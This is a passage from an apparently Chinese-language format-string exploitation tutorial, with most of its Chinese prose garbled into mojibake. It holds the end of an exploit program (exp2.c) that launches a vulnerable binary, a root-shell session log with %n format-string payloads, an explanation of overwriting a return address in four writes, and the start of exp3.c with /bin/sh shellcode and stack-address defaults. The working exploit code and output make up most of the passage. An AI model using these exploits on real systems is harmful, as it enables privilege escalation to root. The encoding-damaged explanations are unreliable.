聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for (i = 0; i < strlen(shellcode); i++)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) *(ptr++) = shellcode[i];聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) egg[eggsize - 1] = '\0';聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) memcpy(egg, "EGG=", 4);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) env[0] = egg ;
聽(tīng) env[1] = (char *)0 ;

聽(tīng) execle("./vul","vul",buff[0],buff[1],buff[2],buff[3],NULL,env);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
}聽(tīng) /* end of main */聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

<- end ->聽(tīng)


[root@rh62 /root]# ./exp2
Usages: ./exp2 <RETloc> <offset> <align> <buffsize> <eggsize>
Using RET location address: 0xbffffa6c
Using Shellcode address: 0xbffffcec

argv[1] = AAl??.10u%.10u%.10u%.10u%.180u%n
argv[2] = AAm??.10u%.10u%.10u%.10u%.196u%n
argv[3] = AAn??.10u%.10u%.10u%.10u%.199u%n
argv[4] = AAo??.10u%.10u%.10u%.10u%.135u%n
bash#

娉ㄦ剰鎴戜滑涓婇潰鐨別xp2.c涓湪璁$畻鏈鍚庝竴涓?.nu鏃跺瓨鍦ㄤ竴浜涢棶棰橈紝濡傛灉
0 < (tmpaddr - 56) < 10 ,閭d箞%.(tmpaddr-56)u 鎵鏄劇ず鐨勯暱搴﹀彲鑳戒笉絳変簬(tmpaddr-56)
,鍚屾牱濡傛灉tmpaddr <= 56 ,閭d箞鎴戜滑鐨剆hellcode鐨勫湴鍧灝變細(xì)鏈夊亸宸紝騫歌繍鐨勬槸錛岀敱浜庢垜浠?br />鐨剆hellcode鏄瓨鏀懼湪鐜鍙橀噺涓紝瀹冮氬父鍦ㄥ爢鏍堢殑楂樼錛屽湴鍧閫氬父鏄?xbffff???,鍙湁鍦板潃
鐨勬渶浣庝竴涓瓧鑺傛墠鍙兘鍑虹幇涓婇潰鎵璁茬殑涓ょ鎯呭喌錛岃屽鏋滄垜浠殑shellcode鍓嶉潰濉厖浜?jiǎn)涓浜?br />NOP鎸囦護(hù)鐨勮瘽錛岄偅涔堟垜浠殑shellcode鍦板潃灝辨湁涓涓寖鍥達(dá)紝鍙钀藉湪榪欎釜鑼冨洿鍐咃紝閮藉彲浠ユ墽琛?br />鎴戜滑鐨剆hellcode,鍥犳鍙鎴戜滑鍦ㄨ繖涓孌靛湴鍧鍐呴夋嫨涓涓湁鏁堢殑鍦板潃灝卞彲浠ヤ簡(jiǎn)銆?br />
榪欎釜紼嬪簭鍦≧edHat 6.1鍜孯edHat 6.2涓嬮兘楠岃瘉閫氳繃銆?br />
<3> 鏀誨嚮鏂規(guī)硶涓夛細(xì)澶氭瑕嗙洊榪斿洖鍦板潃(2)
======================================

鏈夎鑰呭彲鑳戒細(xì)璇達(dá)紝榪欎釜紼嬪簭鐨勬垚鍔熶緷璧栦簬鎴戜滑鍙互榪炵畫(huà)榪涜鍥涙瑕嗙洊銆傚鏋滃彧緇欐垜浠竴嬈?br />鏈轟細(xì)錛屾槸涓嶆槸灝變笉琛屼簡(jiǎn)鍛?鍏跺疄錛岃繕鏈変竴縐嶆柟娉曞彲浠ュ畬鎴愭垜浠殑浠誨姟銆傚熀鏈濊礬涔熸槸鍒嗗洓嬈?br />鏉ヨ鐩栵紝鍙笉榪囬氳繃涓涓?printf()灝卞彲浠ュ畬鎴愪簡(jiǎn)錛岃冭檻涓嬪垪榪欑鎯呭喌錛?br />
聽(tīng) |AARET1|AAAARET2|AAAARET3|AAAARET4|%c...%c|%n1c%n|%n2c%n|%n3c%n|%n4c%n
聽(tīng)聽(tīng)聽(tīng)聽(tīng) ^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ^聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |
聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |_________________|______|______|______|聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |__________________________|______|______|聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) |聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) |___________________________________|______|聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng) |____________________________________________|

鎴戜滑浣跨敤鍥涗釜%n,瀹冧滑浼?xì)渚潒啤灏?涓樉紺洪暱搴︿繚瀛樺埌瀵瑰簲鐨勫湴鍧鍘匯傛垜浠鏋滆皟鏁?c鐨勪釜鏁幫紝
浣跨涓涓?n瀵瑰簲RET1錛岀浜屼釜%n瀵瑰簲RET2錛岀涓変釜%n瀵瑰簲RET3錛岀鍥涗釜%n瀵瑰簲RET4,閭d箞鎴?br />浠氨鎴愬姛浜?jiǎn)涓鍗婁簡(jiǎn)銆傚綋鐒舵垜浠璁?
RET1 = RETloc
RET2 = RETloc + 1
RET3 = RETloc + 2
RET4 = RETloc + 3

n1 = SH4 - 1*4 - 12 - 4 - 8*3
(1*4鏄?涓?c鏄劇ず鐨勯暱搴︼紝12鏄?AA"鍐嶅姞涓婂墠闈㈢殑"argv[.."鐨勯暱搴︼紝4鏄疪ET1闀垮害,8*3鏄悗
闈笁緇?AAAARET"鐨勯暱搴?
n2 = SH3 - SH4
n3 = SH2 - SH3
n4 = SH1 - SH2聽(tīng)

榪欐牱錛屽湪紕板埌絎竴涓?n鏃訛紝鏄劇ず鎬婚暱搴﹀氨鏄疭H4,紕板埌絎簩涓?n鏃訛紝鏄劇ず鎬婚暱搴﹀氨鏄?SH3,渚?br />姝ょ被鎺ㄣ?br />娉ㄦ剰錛氱敱浜嶴H1閫氬父絳変簬0xbf(濡傛灉鏄湪鍫嗘爤涓殑璇?錛岃孲H2閫氬父絳変簬0xff,SH1<SH2,
鍥犳鎴戜滑緇橲H1鍔犱笂涓涓ぇ鏁?x0100錛岃瀹冨彉鎴?x01BF,榪欐牱鍦ㄨ繘琛岀鍥涙瑕嗙洊鐨勬椂鍊欙細(xì)
浼?xì)灏哛ETloc+4鍙樻垚0x01,浣嗚繖閫氬父騫朵笉浼?xì)閫犳垚澶х殑褰卞搷錛孯ETloc+3浠嶇劧琚紜殑鏀規(guī)垚浜?xbf

RETloc聽(tīng) RETloc+1 RETloc+2 RETloc+3聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
|0xec聽(tīng)聽(tīng) | 0xfc聽(tīng)聽(tīng) | 0xff聽(tīng)聽(tīng) |0xbf| 0x01| 0x00| 0x00| 絎洓嬈¤鐩朣H1:聽(tīng) 0xbffffcec聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

鍥犳錛屾垜浠n4 = 0x0100 + SH1 - SH2

鍙﹀鎴戜滑鐨勭▼搴忎腑娌℃湁浣跨敤%.nu鐨勬牸寮忚屾槸閲囩敤浜?nc, 榪欐槸鍥犱負(fù)%nc鍙互鏇村姞鍑嗙‘鐨勫喅瀹?br />鎴戜滑鐨勬樉紺洪暱搴︼紝鍙n>0,鏄劇ず闀垮害鎬繪槸綺劇‘鐨勭瓑浜巒,榪欏氨涓烘垜浠殑璁$畻甯︽潵浜?jiǎn)寰堝ぇ鐨勬?br />渚褲?娉ㄦ剰涓嶈兘浣跨敤%.nc鐨勬牸寮忥紝榪欎笉璧蜂綔鐢? 涓嶈繃%nc浼?xì)鋴社敤绌烘牸鏉ュ~鍏吔I虹櫧閮ㄥ垎錛屽鏋?br />搴旂敤紼嬪簭灝嗙┖鏍間綔涓哄垎闅旂鏉ヨВ閲婃椂錛屽彲鑳戒細(xì)鍑洪棶棰樸?br />
<- begin ->聽(tīng) exp3.c

#include <stdlib.h>聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#include <unistd.h>聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_OFFSET聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 550聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_ALIGNMENT聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 2聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_RETLOC聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0xbffffabc聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_BUFFER_SIZE聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 128聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_EGG_SIZE聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 1024聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define NOP聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0x90聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
char shellcode[] =聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
聽(tīng) "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
聽(tīng) "\x80\xe8\xdc\xff\xff\xff/bin/sh";

聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
unsigned long get_esp(void) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng) __asm__("movl %esp,%eax");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
}聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
main(int argc, char *argv[]) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) char *buff, *ptr, *egg;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) char *env[2];
聽(tīng) long shell_addr,retloc=DEFAULT_RETLOC,tmpaddr;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int offset=DEFAULT_OFFSET, align=DEFAULT_ALIGNMENT;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int bsize=DEFAULT_BUFFER_SIZE, eggsize=DEFAULT_EGG_SIZE;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int i,SH1,SH2,SH3,SH4,oldSH4;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) if (argc > 1) sscanf(argv[1],"%x",&retloc); /* 杈撳叆RETloc */
聽(tīng) if (argc > 2) offset聽(tīng) = atoi(argv[2]);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
